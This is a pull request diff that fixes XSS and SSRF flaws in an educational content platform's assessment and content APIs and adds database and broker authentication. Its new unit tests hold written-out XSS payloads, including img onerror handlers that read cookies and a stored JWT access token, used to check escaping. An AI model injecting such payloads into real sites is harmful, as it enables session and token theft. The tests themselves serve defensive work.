### PR TITLE
fix: Remediate XSS, injection, SSRF vulnerabilities

### DIFF
--- a/assessment-api/assessment-actors/src/main/scala/org/sunbird/v5/managers/AssessmentV5Manager.scala
+++ b/assessment-api/assessment-actors/src/main/scala/org/sunbird/v5/managers/AssessmentV5Manager.scala
@@ -2,7 +2,7 @@ package org.sunbird.v5.managers
 
 import org.apache.commons.collections4.CollectionUtils
 import org.apache.commons.lang3.StringUtils
-import org.sunbird.common.{DateUtils, JsonUtils, Platform}
+import org.sunbird.common.{DateUtils, HtmlSanitizer, JsonUtils, Platform}
 import org.sunbird.common.dto.{Request, Response, ResponseHandler}
 import org.sunbird.common.exception.{ClientException, ServerException}
 import org.sunbird.graph.OntologyEngineContext
@@ -96,9 +96,10 @@ object AssessmentV5Manager {
 
   def getValidatedNodeForUpdateComment(request: Request, errCode: String)(implicit ec: ExecutionContext, oec: OntologyEngineContext): Future[Node] = {
     val identifier = request.getContext.get("identifier")
-    val commentValue = request.getRequest.get("reviewComment").toString
-    if (commentValue == null || commentValue.trim.isEmpty){
-      throw new ClientException(errCode, "Comment key is missing or value is empty in the request body.")
+    val rawComment = request.getRequest.get("reviewComment")
+    val commentValue = if (rawComment != null) rawComment.toString else ""
+    if (commentValue.trim.isEmpty) {
+      Future.failed(new ClientException(errCode, "Comment key is missing or value is empty in the request body."))
     } else {
       val readReq = request
       readReq.put("identifier", identifier)
@@ -329,13 +330,13 @@ object AssessmentV5Manager {
         case "single" => {
           val correctResp = responseData.getOrDefault("correctResponse", Map().asJava).asInstanceOf[util.Map[String, AnyRef]].get("value").asInstanceOf[Integer]
           val label = options.toList.filter(op => op.get("value").asInstanceOf[Integer] == correctResp).head.get("label").asInstanceOf[String]
-          val answer = """<div class="anwser-container"><div class="anwser-body">answer_html</div></div>""".replace("answer_html", label)
+          val answer = """<div class="anwser-container"><div class="anwser-body">answer_html</div></div>""".replace("answer_html", HtmlSanitizer.escapeHtml(label))
           answer
         }
         case "multiple" => {
           val correctResp = responseData.getOrDefault("correctResponse", Map().asJava).asInstanceOf[util.Map[String, AnyRef]].get("value").asInstanceOf[util.List[Integer]]
           val singleAns = """<div class="anwser-body">answer_html</div>"""
-          val answerList: List[String] = options.toList.filter(op => correctResp.contains(op.get("value").asInstanceOf[Integer])).map(op => singleAns.replace("answer_html", op.get("label").asInstanceOf[String])).toList
+          val answerList: List[String] = options.toList.filter(op => correctResp.contains(op.get("value").asInstanceOf[Integer])).map(op => singleAns.replace("answer_html", HtmlSanitizer.escapeHtml(op.get("label").asInstanceOf[String]))).toList
           val answer = """<div class="anwser-container">answer_div</div>""".replace("answer_div", answerList.mkString(""))
           answer
         }

--- a/assessment-api/assessment-actors/src/test/scala/org/sunbird/v5/managers/AssessmentV5ManagerTest.scala
+++ b/assessment-api/assessment-actors/src/test/scala/org/sunbird/v5/managers/AssessmentV5ManagerTest.scala
@@ -1,0 +1,254 @@
+package org.sunbird.v5.managers
+
+import org.scalatest.{FlatSpec, Matchers}
+import org.sunbird.common.dto.Request
+import org.sunbird.common.exception.ClientException
+
+import java.util
+import scala.collection.JavaConverters._
+import scala.concurrent.{Await, Future}
+import scala.concurrent.duration._
+import scala.concurrent.ExecutionContext.Implicits.global
+
+class AssessmentV5ManagerTest extends FlatSpec with Matchers {
+
+  // === getAnswer: single cardinality ===
+
+  "getAnswer" should "return HTML with escaped label for single cardinality" in {
+    val data = buildSingleCardinalityData("Paris")
+    val result = AssessmentV5Manager.getAnswer(data)
+    result should include("<div class=\"anwser-container\">")
+    result should include("Paris")
+  }
+
+  it should "escape script tag in single cardinality label" in {
+    val data = buildSingleCardinalityData("<script>alert('xss')</script>")
+    val result = AssessmentV5Manager.getAnswer(data)
+    result should not include "<script>"
+    result should include("&lt;script&gt;")
+  }
+
+  it should "escape img onerror XSS payload in single cardinality label" in {
+    val data = buildSingleCardinalityData("<img src=x onerror=\"steal(document.cookie)\">")
+    val result = AssessmentV5Manager.getAnswer(data)
+    result should not include "<img"
+    result should include("&lt;img")
+    result should not include "onerror=\"steal"
+    result should include("&quot;")
+  }
+
+  it should "escape nested XSS with event handler in single cardinality label" in {
+    val data = buildSingleCardinalityData("<div onmouseover=\"alert(document.cookie)\">hover</div>")
+    val result = AssessmentV5Manager.getAnswer(data)
+    // Raw div tag must be escaped so onmouseover can't execute
+    result should not include "<div onmouseover"
+    result should include("&lt;div")
+  }
+
+  it should "preserve plain text label in single cardinality" in {
+    val data = buildSingleCardinalityData("42 is the answer")
+    val result = AssessmentV5Manager.getAnswer(data)
+    result should include("42 is the answer")
+    result should include("<div class=\"anwser-body\">")
+  }
+
+  it should "escape ampersand in single cardinality label" in {
+    val data = buildSingleCardinalityData("Tom & Jerry")
+    val result = AssessmentV5Manager.getAnswer(data)
+    result should include("Tom &amp; Jerry")
+  }
+
+  // === getAnswer: multiple cardinality ===
+
+  it should "escape XSS payloads in multiple cardinality labels" in {
+    val data = buildMultipleCardinalityData(
+      List("<script>evil()</script>Option A", "<img src=x onerror=alert(1)>Option B"),
+      List(0, 1)
+    )
+    val result = AssessmentV5Manager.getAnswer(data)
+    result should not include "<script>"
+    result should not include "<img"
+    result should include("&lt;script&gt;")
+    result should include("&lt;img")
+  }
+
+  it should "return correct HTML structure for multiple cardinality" in {
+    val data = buildMultipleCardinalityData(
+      List("Option A", "Option B"),
+      List(0, 1)
+    )
+    val result = AssessmentV5Manager.getAnswer(data)
+    result should include("<div class=\"anwser-container\">")
+    result should include("Option A")
+    result should include("Option B")
+    // Should have two anwser-body divs
+    result.split("anwser-body").length should be(3) // 2 occurrences = 3 splits
+  }
+
+  it should "escape only correct answers in multiple cardinality" in {
+    val data = buildMultipleCardinalityData(
+      List("<script>xss</script>Right", "Wrong", "<img src=x>Also Right"),
+      List(0, 2)
+    )
+    val result = AssessmentV5Manager.getAnswer(data)
+    result should not include "<script>"
+    result should include("&lt;script&gt;")
+    result should not include "Wrong" // Wrong is value=1, not in correctResponse
+    result should include("&lt;img")
+  }
+
+  // === getAnswer: subjective question bypass ===
+
+  it should "return raw answer field for Subjective Question" in {
+    val data = new util.HashMap[String, AnyRef]()
+    data.put("primaryCategory", "Subjective Question")
+    data.put("answer", "This is a text answer")
+    val result = AssessmentV5Manager.getAnswer(data)
+    result shouldBe "This is a text answer"
+  }
+
+  it should "return empty string when no answer field for Subjective Question" in {
+    val data = new util.HashMap[String, AnyRef]()
+    data.put("primaryCategory", "Subjective Question")
+    val result = AssessmentV5Manager.getAnswer(data)
+    result shouldBe ""
+  }
+
+  // === getAnswer: cookie/JWT theft payload (exact from security report) ===
+
+  it should "prevent cookie theft XSS payload from security report XSS-VULN-02" in {
+    val payload = "<img src=x onerror=\"document.title='XSS-VULN-02: '+document.cookie\">"
+    val data = buildSingleCardinalityData(payload)
+    val result = AssessmentV5Manager.getAnswer(data)
+    // Raw HTML tags must be escaped — browser will render as text, not execute
+    result should not include "<img"
+    result should include("&lt;img")
+    // onerror attribute must be escaped so it can't execute
+    result should not include "onerror=\"document"
+    result should include("onerror=&quot;")
+  }
+
+  it should "prevent JWT theft XSS payload" in {
+    val payload = "<img src=x onerror=\"var d=document.createElement('div');d.id='xss-proof';" +
+      "d.innerText='COOKIES:'+document.cookie+' JWT:'+localStorage.getItem('access_token');" +
+      "document.body.appendChild(d)\">"
+    val data = buildSingleCardinalityData(payload)
+    val result = AssessmentV5Manager.getAnswer(data)
+    // Raw HTML tags must be escaped — browser will render as text, not execute
+    result should not include "<img"
+    result should include("&lt;img")
+    // Quotes must be escaped so onerror handler can't execute
+    result should not include "onerror=\"var"
+    result should include("onerror=&quot;")
+  }
+
+  // === getValidatedNodeForUpdateComment ===
+
+  it should "return failed future when reviewComment is null" in {
+    val request = buildCommentRequest(null)
+    val future = AssessmentV5Manager.getValidatedNodeForUpdateComment(request, "ERR_TEST")(global, null)
+    val ex = intercept[ClientException] {
+      Await.result(future, 5.seconds)
+    }
+    ex.getMessage shouldBe "Comment key is missing or value is empty in the request body."
+  }
+
+  it should "return failed future when reviewComment is empty string" in {
+    val request = buildCommentRequest("")
+    val future = AssessmentV5Manager.getValidatedNodeForUpdateComment(request, "ERR_TEST")(global, null)
+    val ex = intercept[ClientException] {
+      Await.result(future, 5.seconds)
+    }
+    ex.getMessage shouldBe "Comment key is missing or value is empty in the request body."
+  }
+
+  it should "return failed future when reviewComment is whitespace only" in {
+    val request = buildCommentRequest("   ")
+    val future = AssessmentV5Manager.getValidatedNodeForUpdateComment(request, "ERR_TEST")(global, null)
+    val ex = intercept[ClientException] {
+      Await.result(future, 5.seconds)
+    }
+    ex.getMessage shouldBe "Comment key is missing or value is empty in the request body."
+  }
+
+  // === Helper methods ===
+
+  private def buildSingleCardinalityData(label: String): util.Map[String, AnyRef] = {
+    val option0 = new util.HashMap[String, AnyRef]()
+    option0.put("value", Integer.valueOf(0))
+    option0.put("label", label)
+
+    val option1 = new util.HashMap[String, AnyRef]()
+    option1.put("value", Integer.valueOf(1))
+    option1.put("label", "Wrong answer")
+
+    val options = new util.ArrayList[util.Map[String, AnyRef]]()
+    options.add(option0)
+    options.add(option1)
+
+    val resp1Interactions = new util.HashMap[String, AnyRef]()
+    resp1Interactions.put("options", options)
+
+    val interactions = new util.HashMap[String, AnyRef]()
+    interactions.put("response1", resp1Interactions)
+
+    val correctResponse = new util.HashMap[String, AnyRef]()
+    correctResponse.put("value", Integer.valueOf(0))
+
+    val response1 = new util.HashMap[String, AnyRef]()
+    response1.put("cardinality", "single")
+    response1.put("correctResponse", correctResponse)
+
+    val responseDeclaration = new util.HashMap[String, AnyRef]()
+    responseDeclaration.put("response1", response1)
+
+    val data = new util.HashMap[String, AnyRef]()
+    data.put("primaryCategory", "Multiple Choice Question")
+    data.put("interactions", interactions)
+    data.put("responseDeclaration", responseDeclaration)
+    data
+  }
+
+  private def buildMultipleCardinalityData(labels: List[String], correctValues: List[Int]): util.Map[String, AnyRef] = {
+    val options = new util.ArrayList[util.Map[String, AnyRef]]()
+    labels.zipWithIndex.foreach { case (label, idx) =>
+      val option = new util.HashMap[String, AnyRef]()
+      option.put("value", Integer.valueOf(idx))
+      option.put("label", label)
+      options.add(option)
+    }
+
+    val resp1Interactions = new util.HashMap[String, AnyRef]()
+    resp1Interactions.put("options", options)
+
+    val interactions = new util.HashMap[String, AnyRef]()
+    interactions.put("response1", resp1Interactions)
+
+    val correctResponse = new util.HashMap[String, AnyRef]()
+    correctResponse.put("value", correctValues.map(Integer.valueOf).asJava)
+
+    val response1 = new util.HashMap[String, AnyRef]()
+    response1.put("cardinality", "multiple")
+    response1.put("correctResponse", correctResponse)
+
+    val responseDeclaration = new util.HashMap[String, AnyRef]()
+    responseDeclaration.put("response1", response1)
+
+    val data = new util.HashMap[String, AnyRef]()
+    data.put("primaryCategory", "Multiple Choice Question")
+    data.put("interactions", interactions)
+    data.put("responseDeclaration", responseDeclaration)
+    data
+  }
+
+  private def buildCommentRequest(comment: AnyRef): Request = {
+    val request = new Request()
+    request.setContext(new util.HashMap[String, AnyRef]() {
+      { put("identifier", "do_1234") }
+    })
+    if (comment != null) {
+      request.getRequest.put("reviewComment", comment)
+    }
+    request
+  }
+}

--- a/assessment-api/assessment-service/conf/application.conf
+++ b/assessment-api/assessment-service/conf/application.conf
@@ -465,3 +465,5 @@ assessment.skip.validation=false
 assessment.default.framework="NCF"
 assessment.item.mime_type="application/vnd.ekstep.ecml-archive"
 assessment.media.resolution="low"
+# HTML Sanitizer Settings
+html.sanitizer.max.depth=25

--- a/assessment-api/assessment-service/conf/application.conf
+++ b/assessment-api/assessment-service/conf/application.conf
@@ -296,7 +296,7 @@ play.filters {
 
   # Enabled filters are run automatically against Play.
   # CSRFFilter, AllowedHostFilters, and SecurityHeadersFilters are enabled by default.
-  enabled = [filters.AccessLogFilter]
+  enabled = [play.filters.headers.SecurityHeadersFilter, filters.AccessLogFilter]
 
   # Disabled filters remove elements from the enabled list.
   # disabled += filters.CSRFFilter
@@ -326,20 +326,11 @@ play.filters {
   # Defines security headers that prevent XSS attacks.
   # If enabled, then all options are set to the below configuration by default:
   headers {
-    # The X-Frame-Options header. If null, the header is not set.
-    #frameOptions = "DENY"
-
-    # The X-XSS-Protection header. If null, the header is not set.
-    #xssProtection = "1; mode=block"
-
-    # The X-Content-Type-Options header. If null, the header is not set.
-    #contentTypeOptions = "nosniff"
-
-    # The X-Permitted-Cross-Domain-Policies header. If null, the header is not set.
-    #permittedCrossDomainPolicies = "master-only"
-
-    # The Content-Security-Policy header. If null, the header is not set.
-    #contentSecurityPolicy = "default-src 'self'"
+    frameOptions = "DENY"
+    xssProtection = null
+    contentTypeOptions = "nosniff"
+    permittedCrossDomainPolicies = null
+    contentSecurityPolicy = null
   }
 
   ## Allowed hosts filter configuration

--- a/assessment-api/assessment-service/conf/application.conf
+++ b/assessment-api/assessment-service/conf/application.conf
@@ -326,10 +326,15 @@ play.filters {
   # Defines security headers that prevent XSS attacks.
   # If enabled, then all options are set to the below configuration by default:
   headers {
+    # Values: "DENY" (block all framing), "SAMEORIGIN" (allow same-origin framing), null (disable header)
     frameOptions = "DENY"
+    # Values: "1; mode=block" (enable legacy XSS auditor), null (disable — recommended, auditor is exploitable)
     xssProtection = null
+    # Values: "nosniff" (prevent MIME-type sniffing), null (disable header)
     contentTypeOptions = "nosniff"
+    # Values: "none", "master-only", "by-content-type", "all", null (disable — not needed for JSON APIs)
     permittedCrossDomainPolicies = null
+    # Values: CSP directive string e.g. "default-src 'self'", null (disable — not meaningful for JSON APIs)
     contentSecurityPolicy = null
   }
 

--- a/content-api/content-actors/src/main/scala/org/sunbird/content/util/CopyManager.scala
+++ b/content-api/content-actors/src/main/scala/org/sunbird/content/util/CopyManager.scala
@@ -193,6 +193,7 @@ object CopyManager {
     }
 
     def copyURLToFile(objectId: String, fileUrl: String): File = try {
+        org.sunbird.common.SafeUrlValidator.validate(fileUrl)
         val file = new File(getBasePath(objectId) + File.separator + getFileNameFromURL(fileUrl))
         FileUtils.copyURLToFile(new URL(fileUrl), file)
         file
@@ -224,7 +225,15 @@ object CopyManager {
     protected def getFileNameFromURL(fileUrl: String): String = if (!FilenameUtils.getExtension(fileUrl).isEmpty)
         FilenameUtils.getBaseName(fileUrl) + "_" + System.currentTimeMillis + "." + FilenameUtils.getExtension(fileUrl) else FilenameUtils.getBaseName(fileUrl) + "_" + System.currentTimeMillis
 
-    protected def isInternalUrl(url: String)(implicit ss: StorageService): Boolean = url.contains(ss.getContainerName)
+    protected def isInternalUrl(url: String)(implicit ss: StorageService): Boolean = {
+        try {
+            val parsedUrl = new URL(url)
+            val containerName = ss.getContainerName
+            parsedUrl.getHost.contains(containerName) || parsedUrl.getPath.contains(containerName)
+        } catch {
+            case _: Exception => false
+        }
+    }
 
     def prepareHierarchyRequest(originHierarchy: util.Map[String, AnyRef], originNode: Node, node: Node, copyType: String, request: Request):util.HashMap[String, AnyRef] = {
         val children:util.List[util.Map[String, AnyRef]] = originHierarchy.get("children").asInstanceOf[util.List[util.Map[String, AnyRef]]]

--- a/content-api/content-actors/src/main/scala/org/sunbird/content/util/CopyManager.scala
+++ b/content-api/content-actors/src/main/scala/org/sunbird/content/util/CopyManager.scala
@@ -228,8 +228,13 @@ object CopyManager {
     protected def isInternalUrl(url: String)(implicit ss: StorageService): Boolean = {
         try {
             val parsedUrl = new URL(url)
+            val host = parsedUrl.getHost.toLowerCase
             val containerName = ss.getContainerName
-            parsedUrl.getHost.contains(containerName) || parsedUrl.getPath.contains(containerName)
+            val knownDomains = List(".blob.core.windows.net", ".s3.amazonaws.com", ".storage.googleapis.com")
+            val isKnownCloudHost = knownDomains.exists(domain => host.endsWith(domain))
+            val hostMatch = isKnownCloudHost && host.startsWith(containerName + ".")
+            val pathMatch = parsedUrl.getPath.startsWith("/" + containerName + "/")
+            hostMatch || pathMatch
         } catch {
             case _: Exception => false
         }

--- a/content-api/content-service/conf/application.conf
+++ b/content-api/content-service/conf/application.conf
@@ -772,3 +772,5 @@ cloudstorage.metadata.list=["appIcon", "artifactUrl", "posterImage", "previewUrl
 
 # Set true to enable sending event to asset enrichment job
 asset_enrichment.enable=false
+# HTML Sanitizer Settings
+html.sanitizer.max.depth=25

--- a/content-api/content-service/conf/application.conf
+++ b/content-api/content-service/conf/application.conf
@@ -329,10 +329,15 @@ play.filters {
   # Defines security headers that prevent XSS attacks.
   # If enabled, then all options are set to the below configuration by default:
   headers {
+    # Values: "DENY" (block all framing), "SAMEORIGIN" (allow same-origin framing), null (disable header)
     frameOptions = "DENY"
+    # Values: "1; mode=block" (enable legacy XSS auditor), null (disable — recommended, auditor is exploitable)
     xssProtection = null
+    # Values: "nosniff" (prevent MIME-type sniffing), null (disable header)
     contentTypeOptions = "nosniff"
+    # Values: "none", "master-only", "by-content-type", "all", null (disable — not needed for JSON APIs)
     permittedCrossDomainPolicies = null
+    # Values: CSP directive string e.g. "default-src 'self'", null (disable — not meaningful for JSON APIs)
     contentSecurityPolicy = null
   }
 

--- a/content-api/content-service/conf/application.conf
+++ b/content-api/content-service/conf/application.conf
@@ -299,7 +299,7 @@ play.filters {
 
   # Enabled filters are run automatically against Play.
   # CSRFFilter, AllowedHostFilters, and SecurityHeadersFilters are enabled by default.
-  enabled = [filters.AccessLogFilter]
+  enabled = [play.filters.headers.SecurityHeadersFilter, filters.AccessLogFilter]
 
   # Disabled filters remove elements from the enabled list.
   # disabled += filters.CSRFFilter
@@ -329,20 +329,11 @@ play.filters {
   # Defines security headers that prevent XSS attacks.
   # If enabled, then all options are set to the below configuration by default:
   headers {
-    # The X-Frame-Options header. If null, the header is not set.
-    #frameOptions = "DENY"
-
-    # The X-XSS-Protection header. If null, the header is not set.
-    #xssProtection = "1; mode=block"
-
-    # The X-Content-Type-Options header. If null, the header is not set.
-    #contentTypeOptions = "nosniff"
-
-    # The X-Permitted-Cross-Domain-Policies header. If null, the header is not set.
-    #permittedCrossDomainPolicies = "master-only"
-
-    # The Content-Security-Policy header. If null, the header is not set.
-    #contentSecurityPolicy = "default-src 'self'"
+    frameOptions = "DENY"
+    xssProtection = null
+    contentTypeOptions = "nosniff"
+    permittedCrossDomainPolicies = null
+    contentSecurityPolicy = null
   }
 
   ## Allowed hosts filter configuration

--- a/knowlg-service/conf/application.conf
+++ b/knowlg-service/conf/application.conf
@@ -903,3 +903,6 @@ neo4j_objecttypes_enabled=["Question"]
 # JanusGraph ttl for transactional log table
 # Current value = 48 Hrs
 graph.log.learning_graph_events.ttl = 172800
+
+# HTML Sanitizer Settings
+html.sanitizer.max.depth=25

--- a/knowlg-service/conf/application.conf
+++ b/knowlg-service/conf/application.conf
@@ -403,10 +403,15 @@ play.filters {
   # Defines security headers that prevent XSS attacks.
   # If enabled, then all options are set to the below configuration by default:
   headers {
+    # Values: "DENY" (block all framing), "SAMEORIGIN" (allow same-origin framing), null (disable header)
     frameOptions = "DENY"
+    # Values: "1; mode=block" (enable legacy XSS auditor), null (disable — recommended, auditor is exploitable)
     xssProtection = null
+    # Values: "nosniff" (prevent MIME-type sniffing), null (disable header)
     contentTypeOptions = "nosniff"
+    # Values: "none", "master-only", "by-content-type", "all", null (disable — not needed for JSON APIs)
     permittedCrossDomainPolicies = null
+    # Values: CSP directive string e.g. "default-src 'self'", null (disable — not meaningful for JSON APIs)
     contentSecurityPolicy = null
   }
 

--- a/knowlg-service/conf/application.conf
+++ b/knowlg-service/conf/application.conf
@@ -373,7 +373,7 @@ play.filters {
 
   # Enabled filters are run automatically against Play.
   # CSRFFilter, AllowedHostFilters, and SecurityHeadersFilters are enabled by default.
-  enabled = [filters.AccessLogFilter]
+  enabled = [play.filters.headers.SecurityHeadersFilter, filters.AccessLogFilter]
 
   # Disabled filters remove elements from the enabled list.
   # disabled += filters.CSRFFilter
@@ -403,20 +403,11 @@ play.filters {
   # Defines security headers that prevent XSS attacks.
   # If enabled, then all options are set to the below configuration by default:
   headers {
-    # The X-Frame-Options header. If null, the header is not set.
-    #frameOptions = "DENY"
-
-    # The X-XSS-Protection header. If null, the header is not set.
-    #xssProtection = "1; mode=block"
-
-    # The X-Content-Type-Options header. If null, the header is not set.
-    #contentTypeOptions = "nosniff"
-
-    # The X-Permitted-Cross-Domain-Policies header. If null, the header is not set.
-    #permittedCrossDomainPolicies = "master-only"
-
-    # The Content-Security-Policy header. If null, the header is not set.
-    #contentSecurityPolicy = "default-src 'self'"
+    frameOptions = "DENY"
+    xssProtection = null
+    contentTypeOptions = "nosniff"
+    permittedCrossDomainPolicies = null
+    contentSecurityPolicy = null
   }
 
   ## Allowed hosts filter configuration

--- a/ontology-engine/graph-dac-api/src/main/java/org/sunbird/graph/service/util/DriverUtil.java
+++ b/ontology-engine/graph-dac-api/src/main/java/org/sunbird/graph/service/util/DriverUtil.java
@@ -98,6 +98,14 @@ public class DriverUtil {
 			}
 		}
 
+		// Add CQL authentication if configured
+		if (Platform.config.hasPath("graph.storage.username")) {
+			props.put("storage.username", Platform.config.getString("graph.storage.username"));
+		}
+		if (Platform.config.hasPath("graph.storage.password")) {
+			props.put("storage.password", Platform.config.getString("graph.storage.password"));
+		}
+
 		if (!props.containsKey("storage.cql.local-datacenter")) {
 			props.put("storage.cql.local-datacenter", "datacenter1");
 		}

--- a/ontology-engine/graph-dac-api/src/main/java/org/sunbird/graph/service/util/DriverUtil.java
+++ b/ontology-engine/graph-dac-api/src/main/java/org/sunbird/graph/service/util/DriverUtil.java
@@ -100,10 +100,16 @@ public class DriverUtil {
 
 		// Add CQL authentication if configured
 		if (Platform.config.hasPath("graph.storage.username")) {
-			props.put("storage.username", Platform.config.getString("graph.storage.username"));
+			String username = Platform.config.getString("graph.storage.username");
+			if (username != null && !username.trim().isEmpty()) {
+				props.put("storage.username", username);
+			}
 		}
 		if (Platform.config.hasPath("graph.storage.password")) {
-			props.put("storage.password", Platform.config.getString("graph.storage.password"));
+			String password = Platform.config.getString("graph.storage.password");
+			if (password != null && !password.trim().isEmpty()) {
+				props.put("storage.password", password);
+			}
 		}
 
 		if (!props.containsKey("storage.cql.local-datacenter")) {

--- a/platform-core/cassandra-connector/src/main/java/org/sunbird/cassandra/CassandraConnector.java
+++ b/platform-core/cassandra-connector/src/main/java/org/sunbird/cassandra/CassandraConnector.java
@@ -161,6 +161,15 @@ public class CassandraConnector {
 				.withRetryPolicy(DefaultRetryPolicy.INSTANCE)
 				.withoutJMXReporting();
 
+		// Add authentication if configured
+		String username = Platform.config.hasPath("cassandra.auth.username")
+				? Platform.config.getString("cassandra.auth.username") : "";
+		String password = Platform.config.hasPath("cassandra.auth.password")
+				? Platform.config.getString("cassandra.auth.password") : "";
+		if (!username.isEmpty() && !password.isEmpty()) {
+			builder.withCredentials(username, password);
+		}
+
 		if (level != null)
 			builder.withQueryOptions(new QueryOptions().setConsistencyLevel(level));
 

--- a/platform-core/kafka-client/src/main/scala/org/sunbird/kafka/client/KafkaClient.scala
+++ b/platform-core/kafka-client/src/main/scala/org/sunbird/kafka/client/KafkaClient.scala
@@ -64,25 +64,53 @@ class KafkaClient {
 		}))
 	}
 
-	private def createProducer(): KafkaProducer[Long, String] = {
-		new KafkaProducer[Long, String](new Properties() {
-			{
-				put(ProducerConfig.BOOTSTRAP_SERVERS_CONFIG, BOOTSTRAP_SERVERS)
-				put(ProducerConfig.CLIENT_ID_CONFIG, "KafkaClientProducer")
-				put(ProducerConfig.KEY_SERIALIZER_CLASS_CONFIG, classOf[LongSerializer].getName)
-				put(ProducerConfig.VALUE_SERIALIZER_CLASS_CONFIG, classOf[StringSerializer].getName)
+	private def applySaslConfig(props: Properties): Unit = {
+		val saslEnabled = Platform.getBoolean("kafka.sasl.enabled", false)
+		if (saslEnabled) {
+			val mechanism = Platform.getString("kafka.sasl.mechanism", "PLAIN")
+			val protocol = Platform.getString("kafka.security.protocol", "SASL_PLAINTEXT")
+			props.put("security.protocol", protocol)
+			props.put("sasl.mechanism", mechanism)
+
+			// Option 1: Full JAAS config string (for advanced use cases like SCRAM/GSSAPI)
+			val jaasConfig = Platform.getString("kafka.sasl.jaas.config", "")
+			if (jaasConfig.nonEmpty) {
+				props.put("sasl.jaas.config", jaasConfig)
+			} else {
+				// Option 2: Build JAAS from simple username/password (no escaping needed in ConfigMap)
+				val username = Platform.getString("kafka.sasl.username", "")
+				val password = Platform.getString("kafka.sasl.password", "")
+				if (username.nonEmpty && password.nonEmpty) {
+					val loginModule = mechanism match {
+						case "SCRAM-SHA-256" | "SCRAM-SHA-512" =>
+							"org.apache.kafka.common.security.scram.ScramLoginModule"
+						case _ =>
+							"org.apache.kafka.common.security.plain.PlainLoginModule"
+					}
+					props.put("sasl.jaas.config",
+						s"""$loginModule required username="$username" password="$password";""")
+				}
 			}
-		})
+		}
+	}
+
+	private def createProducer(): KafkaProducer[Long, String] = {
+		val props = new Properties()
+		props.put(ProducerConfig.BOOTSTRAP_SERVERS_CONFIG, BOOTSTRAP_SERVERS)
+		props.put(ProducerConfig.CLIENT_ID_CONFIG, "KafkaClientProducer")
+		props.put(ProducerConfig.KEY_SERIALIZER_CLASS_CONFIG, classOf[LongSerializer].getName)
+		props.put(ProducerConfig.VALUE_SERIALIZER_CLASS_CONFIG, classOf[StringSerializer].getName)
+		applySaslConfig(props)
+		new KafkaProducer[Long, String](props)
 	}
 
 	private def createConsumer(): KafkaConsumer[Long, String] = {
-		new KafkaConsumer[Long, String](new Properties() {
-			{
-				put(ConsumerConfig.BOOTSTRAP_SERVERS_CONFIG, BOOTSTRAP_SERVERS)
-				put(ConsumerConfig.CLIENT_ID_CONFIG, "KafkaClientConsumer")
-				put(ConsumerConfig.KEY_DESERIALIZER_CLASS_CONFIG, classOf[LongDeserializer].getName)
-				put(ConsumerConfig.VALUE_DESERIALIZER_CLASS_CONFIG, classOf[StringDeserializer].getName)
-			}
-		})
+		val props = new Properties()
+		props.put(ConsumerConfig.BOOTSTRAP_SERVERS_CONFIG, BOOTSTRAP_SERVERS)
+		props.put(ConsumerConfig.CLIENT_ID_CONFIG, "KafkaClientConsumer")
+		props.put(ConsumerConfig.KEY_DESERIALIZER_CLASS_CONFIG, classOf[LongDeserializer].getName)
+		props.put(ConsumerConfig.VALUE_DESERIALIZER_CLASS_CONFIG, classOf[StringDeserializer].getName)
+		applySaslConfig(props)
+		new KafkaConsumer[Long, String](props)
 	}
 }

--- a/platform-core/platform-cache/src/main/scala/org/sunbird/cache/util/RedisConnector.scala
+++ b/platform-core/platform-cache/src/main/scala/org/sunbird/cache/util/RedisConnector.scala
@@ -13,6 +13,7 @@ trait RedisConnector {
 	private val PORT = Platform.getInteger("redis.port", 6379)
 	private val MAX_CONNECTIONS = Platform.getInteger("redis.maxConnections", 128)
 	private val INDEX = Platform.getInteger("redis.dbIndex", 0)
+	private val PASSWORD: String = Platform.getString("redis.password", "")
 	protected val isEnabled: Boolean = Platform.getBoolean("redis.enable", false)
 
 	@volatile private var jedisPoolOpt: Option[JedisPool] = None
@@ -22,7 +23,11 @@ trait RedisConnector {
 			case Some(pool) => pool
 			case None =>
 				TelemetryManager.info("Initializing Redis connection pool at " + HOST + ":" + PORT)
-				val pool = new JedisPool(getConfig(), HOST, PORT)
+				val pool = if (PASSWORD.nonEmpty) {
+					new JedisPool(getConfig(), HOST, PORT, 2000, PASSWORD)
+				} else {
+					new JedisPool(getConfig(), HOST, PORT)
+				}
 				jedisPoolOpt = Some(pool)
 				pool
 		}

--- a/platform-core/platform-common/pom.xml
+++ b/platform-core/platform-common/pom.xml
@@ -86,6 +86,11 @@
             <version>20231013</version>
         </dependency>
         <dependency>
+            <groupId>com.googlecode.owasp-java-html-sanitizer</groupId>
+            <artifactId>owasp-java-html-sanitizer</artifactId>
+            <version>20240325.1</version>
+        </dependency>
+        <dependency>
             <groupId>org.powermock</groupId>
             <artifactId>powermock-api-mockito</artifactId>
             <version>1.6.4</version>

--- a/platform-core/platform-common/src/main/java/org/sunbird/common/HtmlSanitizer.java
+++ b/platform-core/platform-common/src/main/java/org/sunbird/common/HtmlSanitizer.java
@@ -32,6 +32,12 @@ public class HtmlSanitizer {
             "question", "responseDeclaration", "outcomeDeclaration"
     ));
 
+    private static final Set<String> IGNORE_FIELDS = new HashSet<>(Arrays.asList(
+            "createdOn", "lastUpdatedOn", "lastStatusChangedOn", "lastPublishedOn",
+            "lastSubmittedOn", "versionDate", "artifactUrl", "downloadUrl", "previewUrl",
+            "streamingUrl", "appIcon", "posterImage", "toc_url"
+    ));
+
     public static String sanitizeStrict(String input) {
         if (StringUtils.isBlank(input)) return input;
         return STRICT_POLICY.sanitize(input);
@@ -52,7 +58,7 @@ public class HtmlSanitizer {
     }
 
     public static String sanitizeField(String fieldName, String value) {
-        if (StringUtils.isBlank(value)) return value;
+        if (StringUtils.isBlank(value) || IGNORE_FIELDS.contains(fieldName)) return value;
         if (RICH_TEXT_FIELDS.contains(fieldName)) {
             return sanitizeRichText(value);
         }

--- a/platform-core/platform-common/src/main/java/org/sunbird/common/HtmlSanitizer.java
+++ b/platform-core/platform-common/src/main/java/org/sunbird/common/HtmlSanitizer.java
@@ -4,6 +4,7 @@ import org.apache.commons.lang3.StringUtils;
 import org.owasp.html.HtmlPolicyBuilder;
 import org.owasp.html.PolicyFactory;
 import org.sunbird.common.Platform;
+import java.util.ArrayList;
 import java.util.Arrays;
 import java.util.HashSet;
 import java.util.List;
@@ -85,11 +86,21 @@ public class HtmlSanitizer {
             if (json instanceof Map) {
                 sanitizeMap((Map<String, Object>) json, depth + 1);
             } else if (json instanceof List) {
+                json = ensureMutableList((List<Object>) json);
                 sanitizeList(fieldName, (List<Object>) json, depth + 1);
             }
             return JsonUtils.serialize(json);
         } catch (Exception e) {
